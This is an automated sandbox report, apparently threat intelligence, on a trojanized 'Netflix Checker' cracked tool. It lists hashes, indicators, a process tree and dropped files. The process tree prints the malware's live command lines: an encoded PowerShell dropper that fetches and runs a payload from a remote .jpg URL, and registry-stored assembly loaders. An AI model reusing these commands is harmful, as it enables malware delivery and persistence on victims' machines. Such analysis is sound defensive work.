1070b4766e0979a8e15ddbd3d0ba27a9d05272027b3a20eaaf9c9fd854f2def7

Analysis

max time kernel
28s
max time network
33s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
23-06-2023 22:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Netflix Tools PACK/Netflix Tools PACK/Netflix Checker by GOD Cracked By GM`ka/xNet/procs.exe
Size

1.7MB
MD5

98bfaca19a9ae44bb60fbc3e98e54d09
SHA1

e2f100fc3eb808fe26cdc26327920293c1272cab
SHA256

a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3
SHA512

d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe
SSDEEP

49152:Cl1b5zTZ5YfiyFc7Eno6T2te21ZkWQ5XK9Ey5:CdzxCzfTOe2k5amW

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://6.top4top.net/p_13529t6r71.jpg

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

16 4692 powershell.exe
18 4692 powershell.exe

flow	pid	process
16	4692	powershell.exe
18	4692	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeprocs.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation	procs.exe

Drops startup file 2 IoCs

Processes:

WScript.exeWScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk	WScript.exe

Executes dropped EXE 1 IoCs

Processes:

Checker Netflix.exe

pid process

1836 Checker Netflix.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

procs.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000_Classes\Local Settings procs.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4692 powershell.exe
4692 powershell.exe
4524 powershell.exe
3748 powershell.exe
3748 powershell.exe
4524 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4692 powershell.exe
Token: SeDebugPrivilege 3748 powershell.exe
Token: SeDebugPrivilege 4524 powershell.exe

pid	process
1836	Checker Netflix.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000_Classes\Local Settings	procs.exe

pid	process
4692	powershell.exe
4692	powershell.exe
4524	powershell.exe
3748	powershell.exe
3748	powershell.exe
4524	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4692	powershell.exe
Token: SeDebugPrivilege	3748	powershell.exe
Token: SeDebugPrivilege	4524	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

procs.exeWScript.exeWScript.exeWScript.exe

description	pid	process	target process
PID 4136 wrote to memory of 1836	4136	procs.exe	Checker Netflix.exe
PID 4136 wrote to memory of 1836	4136	procs.exe	Checker Netflix.exe
PID 4136 wrote to memory of 1836	4136	procs.exe	Checker Netflix.exe
PID 4136 wrote to memory of 2880	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 2880	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 2880	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 2836	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 2836	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 2836	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 1724	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 1724	4136	procs.exe	WScript.exe
PID 4136 wrote to memory of 1724	4136	procs.exe	WScript.exe
PID 2836 wrote to memory of 4692	2836	WScript.exe	powershell.exe
PID 2836 wrote to memory of 4692	2836	WScript.exe	powershell.exe
PID 2836 wrote to memory of 4692	2836	WScript.exe	powershell.exe
PID 1724 wrote to memory of 4524	1724	WScript.exe	powershell.exe
PID 1724 wrote to memory of 4524	1724	WScript.exe	powershell.exe
PID 1724 wrote to memory of 4524	1724	WScript.exe	powershell.exe
PID 2880 wrote to memory of 3748	2880	WScript.exe	powershell.exe
PID 2880 wrote to memory of 3748	2880	WScript.exe	powershell.exe
PID 2880 wrote to memory of 3748	2880	WScript.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix Tools PACK\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\procs.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4136
- C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
  "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
  2⤵
  - Executes dropped EXE
  PID:1836
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3748
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4692
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:1724
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4524

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
eec69f1a7eff9b5f29366da620e7de88

SHA1
be3b8ae89646aa781dfeb338ecf1b10a8c0c6060

SHA256
ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2

SHA512
70d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa1vl5qb.isl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

Filesize
1.5MB

MD5
068068c3cefb4c8d997271897c3173bb

SHA1
d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

SHA256
23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

SHA512
0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

Download Submit
C:\Users\Admin\AppData\Roaming\l1l1l.vbs

Filesize
129KB

MD5
c78f607c916f060d6ee3bf391e303acc

SHA1
1575998cda060d4a570ba258abc12044601da283

SHA256
f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4

SHA512
cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b

Download Submit
C:\Users\Admin\AppData\Roaming\powershell.js

Filesize
2KB

MD5
40b65baa1541784dd92f5aa8ae11b0ef

SHA1
0772c95f56a025704c01389f2d1108a17fb987cf

SHA256
9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699

SHA512
fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2

Download Submit
C:\Users\Admin\AppData\Roaming\r1r1.vbs

Filesize
87KB

MD5
0494f414da149631c3d59861865dad37

SHA1
c9fd335759efb52e58acb974af27cdecb35d0f10

SHA256
a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56

SHA512
a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333

Download Submit
memory/1836-151-0x0000000000280000-0x0000000000400000-memory.dmp

Filesize
1.5MB

Download
memory/1836-224-0x0000000004D90000-0x0000000004DA0000-memory.dmp

Filesize
64KB

Download
memory/1836-208-0x0000000004D90000-0x0000000004DA0000-memory.dmp

Filesize
64KB

Download
memory/1836-157-0x0000000004D90000-0x0000000004DA0000-memory.dmp

Filesize
64KB

Download
memory/1836-220-0x0000000004D90000-0x0000000004DA0000-memory.dmp

Filesize
64KB

Download
memory/1836-165-0x00000000074D0000-0x00000000074DA000-memory.dmp

Filesize
40KB

Download
memory/1836-166-0x00000000080E0000-0x0000000008136000-memory.dmp

Filesize
344KB

Download
memory/1836-158-0x00000000074E0000-0x000000000757C000-memory.dmp

Filesize
624KB

Download
memory/1836-160-0x0000000007580000-0x0000000007612000-memory.dmp

Filesize
584KB

Download
memory/1836-159-0x0000000007B30000-0x00000000080D4000-memory.dmp

Filesize
5.6MB

Download
memory/3748-225-0x0000000002B00000-0x0000000002B10000-memory.dmp

Filesize
64KB

Download
memory/3748-207-0x0000000002B00000-0x0000000002B10000-memory.dmp

Filesize
64KB

Download
memory/3748-215-0x0000000002B00000-0x0000000002B10000-memory.dmp

Filesize
64KB

Download
memory/3748-213-0x0000000007780000-0x0000000007816000-memory.dmp

Filesize
600KB

Download
memory/3748-210-0x0000000006940000-0x0000000006984000-memory.dmp

Filesize
272KB

Download
memory/3748-206-0x0000000002B00000-0x0000000002B10000-memory.dmp

Filesize
64KB

Download
memory/3748-223-0x0000000002B00000-0x0000000002B10000-memory.dmp

Filesize
64KB

Download
memory/4524-214-0x0000000006CE0000-0x0000000006D02000-memory.dmp

Filesize
136KB

Download
memory/4524-222-0x0000000002490000-0x00000000024A0000-memory.dmp

Filesize
64KB

Download
memory/4524-226-0x0000000002490000-0x00000000024A0000-memory.dmp

Filesize
64KB

Download
memory/4524-205-0x0000000002490000-0x00000000024A0000-memory.dmp

Filesize
64KB

Download
memory/4524-203-0x0000000002490000-0x00000000024A0000-memory.dmp

Filesize
64KB

Download
memory/4524-221-0x0000000002490000-0x00000000024A0000-memory.dmp

Filesize
64KB

Download
memory/4524-217-0x0000000007160000-0x00000000071D6000-memory.dmp

Filesize
472KB

Download
memory/4524-216-0x0000000002490000-0x00000000024A0000-memory.dmp

Filesize
64KB

Download
memory/4692-173-0x0000000005C60000-0x0000000005CC6000-memory.dmp

Filesize
408KB

Download
memory/4692-171-0x0000000005740000-0x0000000005750000-memory.dmp

Filesize
64KB

Download
memory/4692-185-0x0000000006990000-0x00000000069AE000-memory.dmp

Filesize
120KB

Download
memory/4692-184-0x0000000006520000-0x0000000006586000-memory.dmp

Filesize
408KB

Download
memory/4692-212-0x0000000006E00000-0x0000000006E1A000-memory.dmp

Filesize
104KB

Download
memory/4692-211-0x00000000081B0000-0x000000000882A000-memory.dmp

Filesize
6.5MB

Download
memory/4692-172-0x0000000005B40000-0x0000000005B62000-memory.dmp

Filesize
136KB

Download
memory/4692-168-0x0000000005740000-0x0000000005750000-memory.dmp

Filesize
64KB

Download
memory/4692-164-0x0000000005D80000-0x00000000063A8000-memory.dmp

Filesize
6.2MB

Download
memory/4692-209-0x0000000005740000-0x0000000005750000-memory.dmp

Filesize
64KB

Download
memory/4692-163-0x0000000003160000-0x0000000003196000-memory.dmp

Filesize
216KB

Download